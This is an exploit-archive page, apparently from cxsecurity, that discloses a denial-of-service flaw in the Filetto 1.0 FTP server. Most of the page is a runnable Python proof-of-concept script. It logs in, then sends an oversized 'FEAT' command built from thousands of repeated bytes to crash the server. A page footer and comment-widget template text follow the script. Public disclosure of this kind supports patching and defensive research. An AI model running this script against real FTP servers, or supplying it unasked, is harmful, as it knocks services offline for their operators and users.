Filetto v1.0 - 'FEAT' Denial of Service (PoC)

2020.05.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================== ======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] ========================= ==================================================================================================== # Exploit Title: Filetto v1.0 - 'FEAT' Denial of Service (PoC) # Date: [05-13-2020] # # Found by: Alvaro J. Gene (Socket_0x03) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www (dot) teraexe (dot) com # # Software Link: https://sourceforge.net/projects/filetto # Vulnerable Application: Filetto # Version: 1.0 (last version. Updated: 01/31/2020) # Server: FTP Server # Vulnerable Command: FEAT # Tested on: Windows XP SP2 and Windows 7 SP1. from socket import * host = "192.168.0.14" port = 2021 username = "Socket_0x03" password = "password" s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) print s.recv(1024) s.send("USER %s\r\n" % (username)) print s.recv(1024) s.send("PASS %s\r\n" % (password)) print s.recv(1024) buffer = "FEAT " buffer += "\x41\x2c" * 11008 buffer += "\r\n" s.send(buffer) print s.recv(1024) s.close()

References:

https://packetstormsecurity.com/files/157735/Filetto-1.0-Denial-Of-Service.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top